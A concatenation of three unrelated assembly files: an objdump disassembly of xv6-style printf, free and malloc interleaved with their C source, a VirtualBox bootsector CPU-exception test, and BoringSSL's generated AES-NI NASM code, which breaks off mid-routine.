6d1: 89 e5 mov %esp,%ebp
6d3: 57 push %edi
6d4: 56 push %esi
6d5: 53 push %ebx
int c, i, state;
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
6d6: 8d 45 10 lea 0x10(%ebp),%eax
}
// Print to the given fd. Only understands %d, %x, %p, %s.
void
printf(int fd, char *fmt, ...)
{
6d9: 83 ec 2c sub $0x2c,%esp
int c, i, state;
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
6dc: 8b 75 0c mov 0xc(%ebp),%esi
}
// Print to the given fd. Only understands %d, %x, %p, %s.
void
printf(int fd, char *fmt, ...)
{
6df: 8b 7d 08 mov 0x8(%ebp),%edi
int c, i, state;
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
6e2: 89 45 d0 mov %eax,-0x30(%ebp)
6e5: 0f b6 1e movzbl (%esi),%ebx
6e8: 83 c6 01 add $0x1,%esi
6eb: 84 db test %bl,%bl
6ed: 0f 84 b0 00 00 00 je 7a3 <printf+0xd3>
6f3: 31 d2 xor %edx,%edx
6f5: eb 39 jmp 730 <printf+0x60>
6f7: 89 f6 mov %esi,%esi
6f9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
c = fmt[i] & 0xff;
if(state == 0){
if(c == '%'){
700: 83 f8 25 cmp $0x25,%eax
703: 89 55 d4 mov %edx,-0x2c(%ebp)
state = '%';
706: ba 25 00 00 00 mov $0x25,%edx
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
c = fmt[i] & 0xff;
if(state == 0){
if(c == '%'){
70b: 74 18 je 725 <printf+0x55>
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
70d: 8d 45 e2 lea -0x1e(%ebp),%eax
710: 83 ec 04 sub $0x4,%esp
713: 88 5d e2 mov %bl,-0x1e(%ebp)
716: 6a 01 push $0x1
718: 50 push %eax
719: 57 push %edi
71a: e8 83 fe ff ff call 5a2 <write>
71f: 8b 55 d4 mov -0x2c(%ebp),%edx
722: 83 c4 10 add $0x10,%esp
725: 83 c6 01 add $0x1,%esi
int c, i, state;
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
728: 0f b6 5e ff movzbl -0x1(%esi),%ebx
72c: 84 db test %bl,%bl
72e: 74 73 je 7a3 <printf+0xd3>
c = fmt[i] & 0xff;
if(state == 0){
730: 85 d2 test %edx,%edx
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
c = fmt[i] & 0xff;
732: 0f be cb movsbl %bl,%ecx
735: 0f b6 c3 movzbl %bl,%eax
if(state == 0){
738: 74 c6 je 700 <printf+0x30>
if(c == '%'){
state = '%';
} else {
putc(fd, c);
}
} else if(state == '%'){
73a: 83 fa 25 cmp $0x25,%edx
73d: 75 e6 jne 725 <printf+0x55>
if(c == 'd'){
73f: 83 f8 64 cmp $0x64,%eax
742: 0f 84 f8 00 00 00 je 840 <printf+0x170>
printint(fd, *ap, 10, 1);
ap++;
} else if(c == 'x' || c == 'p'){
748: 81 e1 f7 00 00 00 and $0xf7,%ecx
74e: 83 f9 70 cmp $0x70,%ecx
751: 74 5d je 7b0 <printf+0xe0>
printint(fd, *ap, 16, 0);
ap++;
} else if(c == 's'){
753: 83 f8 73 cmp $0x73,%eax
756: 0f 84 84 00 00 00 je 7e0 <printf+0x110>
s = "(null)";
while(*s != 0){
putc(fd, *s);
s++;
}
} else if(c == 'c'){
75c: 83 f8 63 cmp $0x63,%eax
75f: 0f 84 ea 00 00 00 je 84f <printf+0x17f>
putc(fd, *ap);
ap++;
} else if(c == '%'){
765: 83 f8 25 cmp $0x25,%eax
768: 0f 84 c2 00 00 00 je 830 <printf+0x160>
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
76e: 8d 45 e7 lea -0x19(%ebp),%eax
771: 83 ec 04 sub $0x4,%esp
774: c6 45 e7 25 movb $0x25,-0x19(%ebp)
778: 6a 01 push $0x1
77a: 50 push %eax
77b: 57 push %edi
77c: e8 21 fe ff ff call 5a2 <write>
781: 83 c4 0c add $0xc,%esp
784: 8d 45 e6 lea -0x1a(%ebp),%eax
787: 88 5d e6 mov %bl,-0x1a(%ebp)
78a: 6a 01 push $0x1
78c: 50 push %eax
78d: 57 push %edi
78e: 83 c6 01 add $0x1,%esi
791: e8 0c fe ff ff call 5a2 <write>
int c, i, state;
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
796: 0f b6 5e ff movzbl -0x1(%esi),%ebx
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
79a: 83 c4 10 add $0x10,%esp
} else {
// Unknown % sequence. Print it to draw attention.
putc(fd, '%');
putc(fd, c);
}
state = 0;
79d: 31 d2 xor %edx,%edx
int c, i, state;
uint *ap;
state = 0;
ap = (uint*)(void*)&fmt + 1;
for(i = 0; fmt[i]; i++){
79f: 84 db test %bl,%bl
7a1: 75 8d jne 730 <printf+0x60>
putc(fd, c);
}
state = 0;
}
}
}
7a3: 8d 65 f4 lea -0xc(%ebp),%esp
7a6: 5b pop %ebx
7a7: 5e pop %esi
7a8: 5f pop %edi
7a9: 5d pop %ebp
7aa: c3 ret
7ab: 90 nop
7ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
} else if(state == '%'){
if(c == 'd'){
printint(fd, *ap, 10, 1);
ap++;
} else if(c == 'x' || c == 'p'){
printint(fd, *ap, 16, 0);
7b0: 83 ec 0c sub $0xc,%esp
7b3: b9 10 00 00 00 mov $0x10,%ecx
7b8: 6a 00 push $0x0
7ba: 8b 5d d0 mov -0x30(%ebp),%ebx
7bd: 89 f8 mov %edi,%eax
7bf: 8b 13 mov (%ebx),%edx
7c1: e8 6a fe ff ff call 630 <printint>
ap++;
7c6: 89 d8 mov %ebx,%eax
7c8: 83 c4 10 add $0x10,%esp
} else {
// Unknown % sequence. Print it to draw attention.
putc(fd, '%');
putc(fd, c);
}
state = 0;
7cb: 31 d2 xor %edx,%edx
if(c == 'd'){
printint(fd, *ap, 10, 1);
ap++;
} else if(c == 'x' || c == 'p'){
printint(fd, *ap, 16, 0);
ap++;
7cd: 83 c0 04 add $0x4,%eax
7d0: 89 45 d0 mov %eax,-0x30(%ebp)
7d3: e9 4d ff ff ff jmp 725 <printf+0x55>
7d8: 90 nop
7d9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
} else if(c == 's'){
s = (char*)*ap;
7e0: 8b 45 d0 mov -0x30(%ebp),%eax
7e3: 8b 18 mov (%eax),%ebx
ap++;
7e5: 83 c0 04 add $0x4,%eax
7e8: 89 45 d0 mov %eax,-0x30(%ebp)
if(s == 0)
s = "(null)";
7eb: b8 3a 0a 00 00 mov $0xa3a,%eax
7f0: 85 db test %ebx,%ebx
7f2: 0f 44 d8 cmove %eax,%ebx
while(*s != 0){
7f5: 0f b6 03 movzbl (%ebx),%eax
7f8: 84 c0 test %al,%al
7fa: 74 23 je 81f <printf+0x14f>
7fc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
800: 88 45 e3 mov %al,-0x1d(%ebp)
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
803: 8d 45 e3 lea -0x1d(%ebp),%eax
806: 83 ec 04 sub $0x4,%esp
809: 6a 01 push $0x1
ap++;
if(s == 0)
s = "(null)";
while(*s != 0){
putc(fd, *s);
s++;
80b: 83 c3 01 add $0x1,%ebx
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
80e: 50 push %eax
80f: 57 push %edi
810: e8 8d fd ff ff call 5a2 <write>
} else if(c == 's'){
s = (char*)*ap;
ap++;
if(s == 0)
s = "(null)";
while(*s != 0){
815: 0f b6 03 movzbl (%ebx),%eax
818: 83 c4 10 add $0x10,%esp
81b: 84 c0 test %al,%al
81d: 75 e1 jne 800 <printf+0x130>
} else {
// Unknown % sequence. Print it to draw attention.
putc(fd, '%');
putc(fd, c);
}
state = 0;
81f: 31 d2 xor %edx,%edx
821: e9 ff fe ff ff jmp 725 <printf+0x55>
826: 8d 76 00 lea 0x0(%esi),%esi
829: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
830: 83 ec 04 sub $0x4,%esp
833: 88 5d e5 mov %bl,-0x1b(%ebp)
836: 8d 45 e5 lea -0x1b(%ebp),%eax
839: 6a 01 push $0x1
83b: e9 4c ff ff ff jmp 78c <printf+0xbc>
} else {
putc(fd, c);
}
} else if(state == '%'){
if(c == 'd'){
printint(fd, *ap, 10, 1);
840: 83 ec 0c sub $0xc,%esp
843: b9 0a 00 00 00 mov $0xa,%ecx
848: 6a 01 push $0x1
84a: e9 6b ff ff ff jmp 7ba <printf+0xea>
84f: 8b 5d d0 mov -0x30(%ebp),%ebx
#include "user.h"
static void
putc(int fd, char c)
{
write(fd, &c, 1);
852: 83 ec 04 sub $0x4,%esp
855: 8b 03 mov (%ebx),%eax
857: 6a 01 push $0x1
859: 88 45 e4 mov %al,-0x1c(%ebp)
85c: 8d 45 e4 lea -0x1c(%ebp),%eax
85f: 50 push %eax
860: 57 push %edi
861: e8 3c fd ff ff call 5a2 <write>
866: e9 5b ff ff ff jmp 7c6 <printf+0xf6>
86b: 66 90 xchg %ax,%ax
86d: 66 90 xchg %ax,%ax
86f: 90 nop
00000870 <free>:
static Header base;
static Header *freep;
void
free(void *ap)
{
870: 55 push %ebp
Header *bp, *p;
bp = (Header*)ap - 1;
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
871: a1 60 0d 00 00 mov 0xd60,%eax
static Header base;
static Header *freep;
void
free(void *ap)
{
876: 89 e5 mov %esp,%ebp
878: 57 push %edi
879: 56 push %esi
87a: 53 push %ebx
87b: 8b 5d 08 mov 0x8(%ebp),%ebx
Header *bp, *p;
bp = (Header*)ap - 1;
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
if(p >= p->s.ptr && (bp > p || bp < p->s.ptr))
87e: 8b 10 mov (%eax),%edx
void
free(void *ap)
{
Header *bp, *p;
bp = (Header*)ap - 1;
880: 8d 4b f8 lea -0x8(%ebx),%ecx
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
883: 39 c8 cmp %ecx,%eax
885: 73 19 jae 8a0 <free+0x30>
887: 89 f6 mov %esi,%esi
889: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
890: 39 d1 cmp %edx,%ecx
892: 72 1c jb 8b0 <free+0x40>
if(p >= p->s.ptr && (bp > p || bp < p->s.ptr))
894: 39 d0 cmp %edx,%eax
896: 73 18 jae 8b0 <free+0x40>
static Header base;
static Header *freep;
void
free(void *ap)
{
898: 89 d0 mov %edx,%eax
Header *bp, *p;
bp = (Header*)ap - 1;
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
89a: 39 c8 cmp %ecx,%eax
if(p >= p->s.ptr && (bp > p || bp < p->s.ptr))
89c: 8b 10 mov (%eax),%edx
free(void *ap)
{
Header *bp, *p;
bp = (Header*)ap - 1;
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
89e: 72 f0 jb 890 <free+0x20>
if(p >= p->s.ptr && (bp > p || bp < p->s.ptr))
8a0: 39 d0 cmp %edx,%eax
8a2: 72 f4 jb 898 <free+0x28>
8a4: 39 d1 cmp %edx,%ecx
8a6: 73 f0 jae 898 <free+0x28>
8a8: 90 nop
8a9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
break;
if(bp + bp->s.size == p->s.ptr){
8b0: 8b 73 fc mov -0x4(%ebx),%esi
8b3: 8d 3c f1 lea (%ecx,%esi,8),%edi
8b6: 39 d7 cmp %edx,%edi
8b8: 74 19 je 8d3 <free+0x63>
bp->s.size += p->s.ptr->s.size;
bp->s.ptr = p->s.ptr->s.ptr;
} else
bp->s.ptr = p->s.ptr;
8ba: 89 53 f8 mov %edx,-0x8(%ebx)
if(p + p->s.size == bp){
8bd: 8b 50 04 mov 0x4(%eax),%edx
8c0: 8d 34 d0 lea (%eax,%edx,8),%esi
8c3: 39 f1 cmp %esi,%ecx
8c5: 74 23 je 8ea <free+0x7a>
p->s.size += bp->s.size;
p->s.ptr = bp->s.ptr;
} else
p->s.ptr = bp;
8c7: 89 08 mov %ecx,(%eax)
freep = p;
8c9: a3 60 0d 00 00 mov %eax,0xd60
}
8ce: 5b pop %ebx
8cf: 5e pop %esi
8d0: 5f pop %edi
8d1: 5d pop %ebp
8d2: c3 ret
bp = (Header*)ap - 1;
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
if(p >= p->s.ptr && (bp > p || bp < p->s.ptr))
break;
if(bp + bp->s.size == p->s.ptr){
bp->s.size += p->s.ptr->s.size;
8d3: 03 72 04 add 0x4(%edx),%esi
8d6: 89 73 fc mov %esi,-0x4(%ebx)
bp->s.ptr = p->s.ptr->s.ptr;
8d9: 8b 10 mov (%eax),%edx
8db: 8b 12 mov (%edx),%edx
8dd: 89 53 f8 mov %edx,-0x8(%ebx)
} else
bp->s.ptr = p->s.ptr;
if(p + p->s.size == bp){
8e0: 8b 50 04 mov 0x4(%eax),%edx
8e3: 8d 34 d0 lea (%eax,%edx,8),%esi
8e6: 39 f1 cmp %esi,%ecx
8e8: 75 dd jne 8c7 <free+0x57>
p->s.size += bp->s.size;
8ea: 03 53 fc add -0x4(%ebx),%edx
p->s.ptr = bp->s.ptr;
} else
p->s.ptr = bp;
freep = p;
8ed: a3 60 0d 00 00 mov %eax,0xd60
bp->s.size += p->s.ptr->s.size;
bp->s.ptr = p->s.ptr->s.ptr;
} else
bp->s.ptr = p->s.ptr;
if(p + p->s.size == bp){
p->s.size += bp->s.size;
8f2: 89 50 04 mov %edx,0x4(%eax)
p->s.ptr = bp->s.ptr;
8f5: 8b 53 f8 mov -0x8(%ebx),%edx
8f8: 89 10 mov %edx,(%eax)
} else
p->s.ptr = bp;
freep = p;
}
8fa: 5b pop %ebx
8fb: 5e pop %esi
8fc: 5f pop %edi
8fd: 5d pop %ebp
8fe: c3 ret
8ff: 90 nop
00000900 <malloc>:
return freep;
}
void*
malloc(uint nbytes)
{
900: 55 push %ebp
901: 89 e5 mov %esp,%ebp
903: 57 push %edi
904: 56 push %esi
905: 53 push %ebx
906: 83 ec 0c sub $0xc,%esp
Header *p, *prevp;
uint nunits;
nunits = (nbytes + sizeof(Header) - 1)/sizeof(Header) + 1;
909: 8b 45 08 mov 0x8(%ebp),%eax
if((prevp = freep) == 0){
90c: 8b 15 60 0d 00 00 mov 0xd60,%edx
malloc(uint nbytes)
{
Header *p, *prevp;
uint nunits;
nunits = (nbytes + sizeof(Header) - 1)/sizeof(Header) + 1;
912: 8d 78 07 lea 0x7(%eax),%edi
915: c1 ef 03 shr $0x3,%edi
918: 83 c7 01 add $0x1,%edi
if((prevp = freep) == 0){
91b: 85 d2 test %edx,%edx
91d: 0f 84 a3 00 00 00 je 9c6 <malloc+0xc6>
923: 8b 02 mov (%edx),%eax
925: 8b 48 04 mov 0x4(%eax),%ecx
base.s.ptr = freep = prevp = &base;
base.s.size = 0;
}
for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){
if(p->s.size >= nunits){
928: 39 cf cmp %ecx,%edi
92a: 76 74 jbe 9a0 <malloc+0xa0>
92c: 81 ff 00 10 00 00 cmp $0x1000,%edi
932: be 00 10 00 00 mov $0x1000,%esi
937: 8d 1c fd 00 00 00 00 lea 0x0(,%edi,8),%ebx
93e: 0f 43 f7 cmovae %edi,%esi
941: ba 00 80 00 00 mov $0x8000,%edx
946: 81 ff ff 0f 00 00 cmp $0xfff,%edi
94c: 0f 46 da cmovbe %edx,%ebx
94f: eb 10 jmp 961 <malloc+0x61>
951: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
nunits = (nbytes + sizeof(Header) - 1)/sizeof(Header) + 1;
if((prevp = freep) == 0){
base.s.ptr = freep = prevp = &base;
base.s.size = 0;
}
for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){
958: 8b 02 mov (%edx),%eax
if(p->s.size >= nunits){
95a: 8b 48 04 mov 0x4(%eax),%ecx
95d: 39 cf cmp %ecx,%edi
95f: 76 3f jbe 9a0 <malloc+0xa0>
p->s.size = nunits;
}
freep = prevp;
return (void*)(p + 1);
}
if(p == freep)
961: 39 05 60 0d 00 00 cmp %eax,0xd60
967: 89 c2 mov %eax,%edx
969: 75 ed jne 958 <malloc+0x58>
char *p;
Header *hp;
if(nu < 4096)
nu = 4096;
p = sbrk(nu * sizeof(Header));
96b: 83 ec 0c sub $0xc,%esp
96e: 53 push %ebx
96f: e8 96 fc ff ff call 60a <sbrk>
if(p == (char*)-1)
974: 83 c4 10 add $0x10,%esp
977: 83 f8 ff cmp $0xffffffff,%eax
97a: 74 1c je 998 <malloc+0x98>
return 0;
hp = (Header*)p;
hp->s.size = nu;
97c: 89 70 04 mov %esi,0x4(%eax)
free((void*)(hp + 1));
97f: 83 ec 0c sub $0xc,%esp
982: 83 c0 08 add $0x8,%eax
985: 50 push %eax
986: e8 e5 fe ff ff call 870 <free>
return freep;
98b: 8b 15 60 0d 00 00 mov 0xd60,%edx
}
freep = prevp;
return (void*)(p + 1);
}
if(p == freep)
if((p = morecore(nunits)) == 0)
991: 83 c4 10 add $0x10,%esp
994: 85 d2 test %edx,%edx
996: 75 c0 jne 958 <malloc+0x58>
return 0;
998: 31 c0 xor %eax,%eax
99a: eb 1c jmp 9b8 <malloc+0xb8>
99c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
base.s.ptr = freep = prevp = &base;
base.s.size = 0;
}
for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){
if(p->s.size >= nunits){
if(p->s.size == nunits)
9a0: 39 cf cmp %ecx,%edi
9a2: 74 1c je 9c0 <malloc+0xc0>
prevp->s.ptr = p->s.ptr;
else {
p->s.size -= nunits;
9a4: 29 f9 sub %edi,%ecx
9a6: 89 48 04 mov %ecx,0x4(%eax)
p += p->s.size;
9a9: 8d 04 c8 lea (%eax,%ecx,8),%eax
p->s.size = nunits;
9ac: 89 78 04 mov %edi,0x4(%eax)
}
freep = prevp;
9af: 89 15 60 0d 00 00 mov %edx,0xd60
return (void*)(p + 1);
9b5: 83 c0 08 add $0x8,%eax
}
if(p == freep)
if((p = morecore(nunits)) == 0)
return 0;
}
}
9b8: 8d 65 f4 lea -0xc(%ebp),%esp
9bb: 5b pop %ebx
9bc: 5e pop %esi
9bd: 5f pop %edi
9be: 5d pop %ebp
9bf: c3 ret
base.s.size = 0;
}
for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){
if(p->s.size >= nunits){
if(p->s.size == nunits)
prevp->s.ptr = p->s.ptr;
9c0: 8b 08 mov (%eax),%ecx
9c2: 89 0a mov %ecx,(%edx)
9c4: eb e9 jmp 9af <malloc+0xaf>
Header *p, *prevp;
uint nunits;
nunits = (nbytes + sizeof(Header) - 1)/sizeof(Header) + 1;
if((prevp = freep) == 0){
base.s.ptr = freep = prevp = &base;
9c6: c7 05 60 0d 00 00 64 movl $0xd64,0xd60
9cd: 0d 00 00
9d0: c7 05 64 0d 00 00 64 movl $0xd64,0xd64
9d7: 0d 00 00
base.s.size = 0;
9da: b8 64 0d 00 00 mov $0xd64,%eax
9df: c7 05 68 0d 00 00 00 movl $0x0,0xd68
9e6: 00 00 00
9e9: e9 3e ff ff ff jmp 92c <malloc+0x2c>
|
; $Id: bootsector2-cpu-xcpt-1.asm $
;; @file
; Bootsector test for basic exception stuff.
;
; Recommended (but not necessary):
; VBoxManage setextradata bs-cpu-xcpt-1 VBoxInternal/Devices/VMMDev/0/Config/TestingEnabled 1
;
;
; Copyright (C) 2007-2015 Oracle Corporation
;
; This file is part of VirtualBox Open Source Edition (OSE), as
; available from http://www.virtualbox.org. This file is free software;
; you can redistribute it and/or modify it under the terms of the GNU
; General Public License (GPL) as published by the Free Software
; Foundation, in version 2 as it comes in the "COPYING" file of the
; VirtualBox OSE distribution. VirtualBox OSE is distributed in the
; hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
;
; The contents of this file may alternatively be used under the terms
; of the Common Development and Distribution License Version 1.0
; (CDDL) only, as it comes in the "COPYING.CDDL" file of the
; VirtualBox OSE distribution, in which case the provisions of the
; CDDL are applicable instead of those of the GPL.
;
; You may elect to license modified versions of this file under the
; terms and conditions of either the GPL or the CDDL or both.
;
;*******************************************************************************
;* Header Files *
;*******************************************************************************
%include "iprt/asmdefs.mac"
%include "iprt/x86.mac"
%include "VBox/VMMDevTesting.mac"
;*******************************************************************************
;* Defined Constants And Macros *
;*******************************************************************************
;; Base address at which we can start testing page tables and page directories.
%define TST_SCRATCH_PD_BASE BS2_MUCK_ABOUT_BASE
;; Base address at which we can start testing the page pointer table.
%define TST_SCRATCH_PDPT_BASE (1 << X86_PDPT_SHIFT)
;; Base address at which we can start testing the page map level 4.
%define TST_SCRATCH_PML4_BASE ((1 << X86_PML4_SHIFT) + TST_SCRATCH_PD_BASE)
;
; Include and execute the init code.
;
%define BS2_INIT_RM
%define BS2_WITH_TRAPS
%define BS2_INC_RM
%define BS2_INC_PE16
%define BS2_INC_PE32
%define BS2_INC_PP16
%define BS2_INC_PP32
%define BS2_INC_PAE16
%define BS2_INC_PAE32
%define BS2_INC_LM16
%define BS2_INC_LM32
%define BS2_INC_LM64
%define BS2_WITH_TRAPRECS
%include "bootsector2-common-init-code.mac"
;
; The main() function.
;
BEGINPROC main
BITS 16
;
; Test prologue.
;
mov ax, .s_szTstName
call TestInit_r86
call Bs2EnableA20_r86
;
; Execute the tests
;
%if 1
call NAME(DoTestsForMode_rm_pe32)
%endif
%if 1
call NAME(DoTestsForMode_rm_pp32)
%endif
%if 1
call NAME(DoTestsForMode_rm_pae32)
%endif
%if 1
call NAME(DoTestsForMode_rm_lm64)
%endif
;
; We're done.
;
call TestTerm_r86
ret
.s_szTstName:
db 'tstCpuXcpt1', 0
ENDPROC main
;
; Instantiate the template code.
;
%include "bootsector2-template-footer.mac" ; reset the initial environemnt.
%define TMPL_PE32
%include "bootsector2-cpu-xcpt-1-template.mac"
%define TMPL_PP32
%include "bootsector2-cpu-xcpt-1-template.mac"
%define TMPL_PAE32
%include "bootsector2-cpu-xcpt-1-template.mac"
%define TMPL_LM64
%include "bootsector2-cpu-xcpt-1-template.mac"
;
; End sections and image.
;
%include "bootsector2-common-end.mac"
|
; This file is generated from a similarly-named Perl script in the BoringSSL
; source tree. Do not edit by hand.
%ifdef BORINGSSL_PREFIX
%include "boringssl_prefix_symbols_nasm.inc"
%endif
%ifidn __OUTPUT_FORMAT__,obj
section code use32 class=code align=64
%elifidn __OUTPUT_FORMAT__,win32
%ifdef __YASM_VERSION_ID__
%if __YASM_VERSION_ID__ < 01010000h
%error yasm version 1.1.0 or later needed.
%endif
; Yasm automatically includes .00 and complains about redefining it.
; https://www.tortall.net/projects/yasm/manual/html/objfmt-win32-safeseh.html
%else
$@feat.00 equ 1
%endif
section .text code align=64
%else
section .text code
%endif
;extern _OPENSSL_ia32cap_P
%ifndef NDEBUG
extern _BORINGSSL_function_hit
%endif
global _aes_hw_encrypt
align 16
_aes_hw_encrypt:
L$_aes_hw_encrypt_begin:
%ifndef NDEBUG
push ebx
push edx
call L$000pic
L$000pic:
pop ebx
lea ebx,[(_BORINGSSL_function_hit+1-L$000pic)+ebx]
mov edx,1
mov BYTE [ebx],dl
pop edx
pop ebx
%endif
mov eax,DWORD [4+esp]
mov edx,DWORD [12+esp]
movups xmm2,[eax]
mov ecx,DWORD [240+edx]
mov eax,DWORD [8+esp]
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$001enc1_loop_1:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$001enc1_loop_1
db 102,15,56,221,209
pxor xmm0,xmm0
pxor xmm1,xmm1
movups [eax],xmm2
pxor xmm2,xmm2
ret
global _aes_hw_decrypt
align 16
_aes_hw_decrypt:
L$_aes_hw_decrypt_begin:
mov eax,DWORD [4+esp]
mov edx,DWORD [12+esp]
movups xmm2,[eax]
mov ecx,DWORD [240+edx]
mov eax,DWORD [8+esp]
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$002dec1_loop_2:
db 102,15,56,222,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$002dec1_loop_2
db 102,15,56,223,209
pxor xmm0,xmm0
pxor xmm1,xmm1
movups [eax],xmm2
pxor xmm2,xmm2
ret
align 16
__aesni_encrypt2:
movups xmm0,[edx]
shl ecx,4
movups xmm1,[16+edx]
xorps xmm2,xmm0
pxor xmm3,xmm0
movups xmm0,[32+edx]
lea edx,[32+ecx*1+edx]
neg ecx
add ecx,16
L$003enc2_loop:
db 102,15,56,220,209
db 102,15,56,220,217
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,220,208
db 102,15,56,220,216
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$003enc2_loop
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,221,208
db 102,15,56,221,216
ret
align 16
__aesni_decrypt2:
movups xmm0,[edx]
shl ecx,4
movups xmm1,[16+edx]
xorps xmm2,xmm0
pxor xmm3,xmm0
movups xmm0,[32+edx]
lea edx,[32+ecx*1+edx]
neg ecx
add ecx,16
L$004dec2_loop:
db 102,15,56,222,209
db 102,15,56,222,217
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,222,208
db 102,15,56,222,216
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$004dec2_loop
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,223,208
db 102,15,56,223,216
ret
align 16
__aesni_encrypt3:
movups xmm0,[edx]
shl ecx,4
movups xmm1,[16+edx]
xorps xmm2,xmm0
pxor xmm3,xmm0
pxor xmm4,xmm0
movups xmm0,[32+edx]
lea edx,[32+ecx*1+edx]
neg ecx
add ecx,16
L$005enc3_loop:
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,220,225
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,220,208
db 102,15,56,220,216
db 102,15,56,220,224
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$005enc3_loop
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,220,225
db 102,15,56,221,208
db 102,15,56,221,216
db 102,15,56,221,224
ret
align 16
__aesni_decrypt3:
movups xmm0,[edx]
shl ecx,4
movups xmm1,[16+edx]
xorps xmm2,xmm0
pxor xmm3,xmm0
pxor xmm4,xmm0
movups xmm0,[32+edx]
lea edx,[32+ecx*1+edx]
neg ecx
add ecx,16
L$006dec3_loop:
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,222,225
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,222,208
db 102,15,56,222,216
db 102,15,56,222,224
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$006dec3_loop
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,222,225
db 102,15,56,223,208
db 102,15,56,223,216
db 102,15,56,223,224
ret
align 16
__aesni_encrypt4:
movups xmm0,[edx]
movups xmm1,[16+edx]
shl ecx,4
xorps xmm2,xmm0
pxor xmm3,xmm0
pxor xmm4,xmm0
pxor xmm5,xmm0
movups xmm0,[32+edx]
lea edx,[32+ecx*1+edx]
neg ecx
db 15,31,64,0
add ecx,16
L$007enc4_loop:
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,220,225
db 102,15,56,220,233
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,220,208
db 102,15,56,220,216
db 102,15,56,220,224
db 102,15,56,220,232
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$007enc4_loop
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,220,225
db 102,15,56,220,233
db 102,15,56,221,208
db 102,15,56,221,216
db 102,15,56,221,224
db 102,15,56,221,232
ret
align 16
__aesni_decrypt4:
movups xmm0,[edx]
movups xmm1,[16+edx]
shl ecx,4
xorps xmm2,xmm0
pxor xmm3,xmm0
pxor xmm4,xmm0
pxor xmm5,xmm0
movups xmm0,[32+edx]
lea edx,[32+ecx*1+edx]
neg ecx
db 15,31,64,0
add ecx,16
L$008dec4_loop:
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,222,225
db 102,15,56,222,233
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,222,208
db 102,15,56,222,216
db 102,15,56,222,224
db 102,15,56,222,232
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$008dec4_loop
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,222,225
db 102,15,56,222,233
db 102,15,56,223,208
db 102,15,56,223,216
db 102,15,56,223,224
db 102,15,56,223,232
ret
align 16
__aesni_encrypt6:
movups xmm0,[edx]
shl ecx,4
movups xmm1,[16+edx]
xorps xmm2,xmm0
pxor xmm3,xmm0
pxor xmm4,xmm0
db 102,15,56,220,209
pxor xmm5,xmm0
pxor xmm6,xmm0
db 102,15,56,220,217
lea edx,[32+ecx*1+edx]
neg ecx
db 102,15,56,220,225
pxor xmm7,xmm0
movups xmm0,[ecx*1+edx]
add ecx,16
jmp NEAR L$009_aesni_encrypt6_inner
align 16
L$010enc6_loop:
db 102,15,56,220,209
db 102,15,56,220,217
